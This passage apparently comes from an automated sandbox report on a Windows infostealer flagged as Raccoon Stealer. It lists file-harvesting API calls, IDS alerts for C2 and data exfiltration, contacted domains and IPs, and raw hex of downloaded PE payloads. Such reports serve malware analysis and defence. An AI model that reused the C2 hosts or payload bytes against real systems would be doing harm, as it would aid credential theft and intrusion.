                      Source: C:\Users\user\AppData\Local\Temp\9779.exeCode function: 22_2_00401090 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\9779.exeCode function: 22_2_00409B40 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\9779.exeCode function: 22_2_00409970 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\9779.exeCode function: 22_2_004087E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,

                      Networking:

                      barindex
                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                      Source: TrafficSnort IDS: 2033973 ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download) 192.168.2.3:49897 -> 185.163.204.24:80
                      Source: TrafficSnort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.3:49929 -> 74.201.28.62:80
                      Source: TrafficSnort IDS: 2033973 ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download) 192.168.2.3:49934 -> 185.163.204.24:80
                      Source: TrafficSnort IDS: 2033974 ET TROJAN Win32.Raccoon Stealer Data Exfil Attempt 192.168.2.3:49934 -> 185.163.204.24:80
                      Source: TrafficSnort IDS: 2033974 ET TROJAN Win32.Raccoon Stealer Data Exfil Attempt 192.168.2.3:49897 -> 185.163.204.24:80
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\explorer.exeDomain query: cdn.discordapp.com
                      Source: C:\Windows\explorer.exeNetwork Connect: 188.166.28.199 80
                      Source: C:\Windows\explorer.exeDomain query: unicupload.top
                      Source: C:\Windows\explorer.exeNetwork Connect: 185.233.81.115 187
                      Source: C:\Windows\explorer.exeNetwork Connect: 185.7.214.171 144
                      Source: C:\Windows\explorer.exeDomain query: host-data-coin-11.com
                      Source: C:\Windows\explorer.exeDomain query: privacy-tools-for-you-780.com
                      Source: C:\Windows\explorer.exeDomain query: goo.su
                      Source: C:\Windows\explorer.exeDomain query: transfer.sh
                      Source: C:\Windows\explorer.exeNetwork Connect: 185.186.142.166 80
                      Source: C:\Windows\explorer.exeDomain query: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: GET /book/KB5009812.png HTTP/1.1Host: 74.201.28.62Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:23:04 GMTContent-Type: application/x-msdos-programContent-Length: 301056Connection: closeLast-Modified: Mon, 10 Jan 2022 12:06:49 GMTETag: "49800-5d5392be00934"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 32 74 07 b2 76 15 69 e1 76 15 69 e1 76 15 69 e1 68 47 fc e1 69 15 69 e1 68 47 ea e1 fc 15 69 e1 68 47 ed e1 5b 15 69 e1 51 d3 12 e1 71 15 69 e1 76 15 68 e1 f9 15 69 e1 68 47 e3 e1 77 15 69 e1 68 47 fd e1 77 15 69 e1 68 47 f8 e1 77 15 69 e1 52 69 63 68 76 15 69 e1 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 d4 e8 62 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 1e 01 00 00 f6 03 00 00 00 00 00 9f 2d 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 20 05 00 00 04 00 00 a7 ea 04 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b0 65 01 00 50 00 00 00 00 00 04 00 b0 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 32 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 59 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c5 1d 01 00 00 10 00 00 00 1e 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 44 3f 00 00 00 30 01 00 00 40 00 00 00 22 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 58 84 02 00 00 70 01 00 00 24 02 00 00 62 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 10 01 00 00 00 04 00 00 12 01 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:23:07 GMTContent-Type: application/x-msdos-programContent-Length: 320000Connection: closeLast-Modified: Fri, 14 Jan 2022 19:23:02 GMTETag: "4e200-5d58fbb413a4c"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6d 1f 39 8a 29 7e 57 d9 29 7e 57 d9 29 7e 57 d9 37 2c c2 d9 33 7e 57 d9 37 2c d4 d9 af 7e 57 d9 0e b8 2c d9 2e 7e 57 d9 29 7e 56 d9 c9 7e 57 d9 37 2c d3 d9 13 7e 57 d9 37 2c c3 d9 28 7e 57 d9 37 2c c6 d9 28 7e 57 d9 52 69 63 68 29 7e 57 d9 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 b5 a3 2e 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 e4 03 00 00 ac 11 00 00 00 00 00 90 b2 01 00 00 10 00 00 00 00 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 e0 15 00 00 04 00 00 09 69 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b4 df 03 00 50 00 00 00 00 00 15 00 28 87 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 15 00 00 1e 00 00 a0 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 91 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 4c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 6e e3 03 00 00 10 00 00 00 e4 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 88 c9 10 00 00 00 04 00 00 18 00 00 00 e8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 77 75 6d 65 6e 65 64 05 00 00 00 00 d0 14 00 00 02 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6b 69 6c 6f 68 65 00 ea 00 00 00 00 e0 14 00 00 02 00 00 00 02 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 75 74 6f 68 6f 78 93 0d 00 00 00 f0 14 00 00 0e 00 00 00 04 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 28 87 00 00 00 00 15 00 00 88 00 00 00 12 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5a 46 00 00 00 90 15 00 00 48 00 00 00 9a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:23:11 GMTContent-Type: application/x-msdos-programContent-Length: 324608Connection: closeLast-Modified: Fri, 14 Jan 2022 19:23:02 GMTETag: "4f400-5d58fbb461c4c"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6d 1f 39 8a 29 7e 57 d9 29 7e 57 d9 29 7e 57 d9 37 2c c2 d9 33 7e 57 d9 37 2c d4 d9 af 7e 57 d9 0e b8 2c d9 2e 7e 57 d9 29 7e 56 d9 c9 7e 57 d9 37 2c d3 d9 13 7e 57 d9 37 2c c3 d9 28 7e 57 d9 37 2c c6 d9 28 7e 57 d9 52 69 63 68 29 7e 57 d9 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 6f ac 7d 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 f6 03 00 00 ac 11 00 00 00 00 00 50 c3 01 00 00 10 00 00 00 10 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 f0 15 00 00 04 00 00 5b e9 05 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 74 f0 03 00 50 00 00 00 00 10 15 00 28 87 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 15 00 f8 1d 00 00 a0 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 91 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 4c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 2e f4 03 00 00 10 00 00 00 f6 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 88 c9 10 00 00 10 04 00 00 18 00 00 00 fa 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 7a 69 63 00 00 00 00 05 00 00 00 00 e0 14 00 00 02 00 00 00 12 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 77 75 76 75 68 75 73 ea 00 00 00 00 f0 14 00 00 02 00 00 00 14 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6a 75 66 6f 74 00 00 93 0d 00 00 00 00 15 00 00 0e 00 00 00 16 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 28 87 00 00 00 10 15 00 00 88 00 00 00 24 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 64 46 00 00 00 a0 15 00 00 48 00 00 00 ac 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:23:44 GMTContent-Type: application/x-msdos-programContent-Length: 905216Connection: closeLast-Modified: Thu, 13 Jan 2022 15:53:07 GMTETag: "dd000-5d578aeb4049d"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8b cf 9c fb cf ae f2 a8 cf ae f2 a8 cf ae f2 a8 d1 fc 67 a8 d3 ae f2 a8 d1 fc 71 a8 49 ae f2 a8 d1 fc 76 a8 e1 ae f2 a8 e8 68 89 a8 cc ae f2 a8 cf ae f3 a8 45 ae f2 a8 d1 fc 78 a8 ce ae f2 a8 d1 fc 66 a8 ce ae f2 a8 d1 fc 63 a8 ce ae f2 a8 52 69 63 68 cf ae f2 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 cf 5b b6 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 20 01 00 00 32 0d 00 00 00 00 00 00 30 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 50 7c 02 00 04 00 00 e4 71 0e 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 66 01 00 28 00 00 00 00 70 0d 00 20 cd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 31 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 59 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 88 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 13 1e 01 00 00 10 00 00 00 20 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 22 3f 00 00 00 30 01 00 00 40 00 00 00 24 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 fe 0b 00 00 70 01 00 00 9e 0b 00 00 64 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 20 dd 6e 02 00 70 0d 00 00 ce 00 00 00 02 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 14 Jan 2022 19:23:49 GMTServer: Apache/2.4.38 (Win32) PHP/7.1.26Last-Modified: Fri, 14 Jan 2022 17:15:09 GMTETag: "6ff1c7-5d58df1eec44d"Accept-Ranges: bytesContent-Length: 7336391Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 58 b0 38 63 39 de 6b 63 39 de 6b 63 39 de 6b 77 52 da 6a 68 39 de 6b 77 52 dd 6a 64 39 de 6b 77 52 db 6a df 39 de 6b 05 56 23 6b 67 39 de 6b 31 4c db 6a 45 39 de 6b 31 4c da 6a 72 39 de 6b 31 4c dd 6a 6a 39 de 6b 77 52 df 6a 68 39 de 6b 63 39 df 6b e4 39 de 6b d9 4c da 6a 70 39 de 6b d9 4c dc 6a 62 39 de 6b 52 69 63 68 63 39 de 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 51 ae e1 61 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 1d 00 36 02 00 00 54 01 00 00 00 00 00 c8 a8 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 d0 04 00 00 04 00 00 12 0b 70 00 02 00 60 81 80 84 1e 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 18 5b 03 00 78 00 00 00 00 b0 04 00 e3 05 00 00 00 80 04 00 e8 1d 00 00 00 00 00 00 00 00 00 00 00 c0 04 00 48 07 00 00 20 39 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 39 03 00 38 01 00 00 00 00 00 00 00 00 00 00 00 50 02 00 e8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d0 35 02 00 00 10 00 00 00 36 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 98 18 01 00 00 50 02 00 00 1a 01 00 00 3a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 03 01 00 00 70 03 00 00 0c 00 00 00 54 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 e8 1d 00 00 00 80 04 00 00 1e 00 00 00 60 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 5f 52 44 41 54 41 00 00 f4 00 00 00 00 a0 04 00 00 02 00 00 00 7e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 e3 05 00 00 00 b0 04 00 00 06 00 00 00 80 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 48 07 00 00 00 c0 04 00 00 08 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Fri, 14 Jan 2022 18:57:27 GMTAccept-Ranges: bytesETag: "9bd1193789d81:0"Server: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Fri, 14 Jan 2022 19:23:57 GMTContent-Length: 54272Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 9c 76 4c 96 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 16 00 00 00 bc 00 00 00 00 00 00 12 35 00 00 00 20 00 00 00 40 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 01 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c0 34 00 00 4f 00 00 00 00 40 00 00 5c b9 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 0c 00 00 00 a4 34 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 18 15 00 00 00 20 00 00 00 16 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 5c b9 00 00 00 40 00 00 00 ba 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 01 00 00 02 00 00 00 d2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f4 34 00 00 00 00 00 00 48 00 00 00 02 00 05 00 8c 23 00 00 60 10 00 00 01 00 00 00 01 00 00 06 ec 33 00 00 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 01 00 3a 00 00 00 01 00 00 11 00 28 13 00 00 0a 0b 12 01 28 14 00 00 0a 28 15 00 00 0a 00 73 05 00 00 06 0a 06 6f 04 00 00 06 00 28 13 00 00 0a 0b 12 01 28 14 00 00 0a 28 15 00 00 0a 00 16 0c 2b 00 08 2a 22 02 28 16 00 00 0a 00 2a 00 1b 30 06 00 ae 00 00 00 02 00 00 11 00 d0 20 00 00 01 28 17 00 00 0a 72 01 00 00 70 17 8d 14 00 00 01 25 16 d0 22 00 00 01 28 17 00 00 0a a2 28 18 00 00 0a 14 17 8d 10 00 00 01 25 16 20 20 4e 00 00 8c 22 00 00 01 a2 6f 19 00 00 0a 26 00 20 00 0c 00 00 28 1a 00 00 0a 00 00 de 05 26 00 00 de 00 d0 26 00 00 01 28 17 00 00 0a 72 0d 00 00 70 72 35 00 00 70 72 39 00 00 70 28 1b 00 00 0a 17 8d 14 00 00 01 25 16 d0 27 00 00 01 28 17 00 00 0a a2 28 18 00 00 0a 73 1c 00 00 0a 17 8d 10 00 00 01 25 16 72 3b 00 00 70 a2 6f 19 00 00 0a 74 01 00 00 1b 0a 2b 00 06 2a 00 00 01 10 00 00 00 00 42 00 0f 51 00 05 10 00 00 01 1b 30 03 00 37 01 00 00 03 00 00 11 00 02 28 03 00 00 06 0a 06 14 fe 03 13 04 11 04 2c 0b 06 16 06 8e
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:24:02 GMTContent-Type: application/x-msdos-programContent-Length: 905216Connection: closeLast-Modified: Thu, 13 Jan 2022 15:53:07 GMTETag: "dd000-5d578aeb4049d"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8b cf 9c fb cf ae f2 a8 cf ae f2 a8 cf ae f2 a8 d1 fc 67 a8 d3 ae f2 a8 d1 fc 71 a8 49 ae f2 a8 d1 fc 76 a8 e1 ae f2 a8 e8 68 89 a8 cc ae f2 a8 cf ae f3 a8 45 ae f2 a8 d1 fc 78 a8 ce ae f2 a8 d1 fc 66 a8 ce ae f2 a8 d1 fc 63 a8 ce ae f2 a8 52 69 63 68 cf ae f2 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 cf 5b b6 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 20 01 00 00 32 0d 00 00 00 00 00 00 30 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 50 7c 02 00 04 00 00 e4 71 0e 00 02 00 00 80 00 00 10 00 00 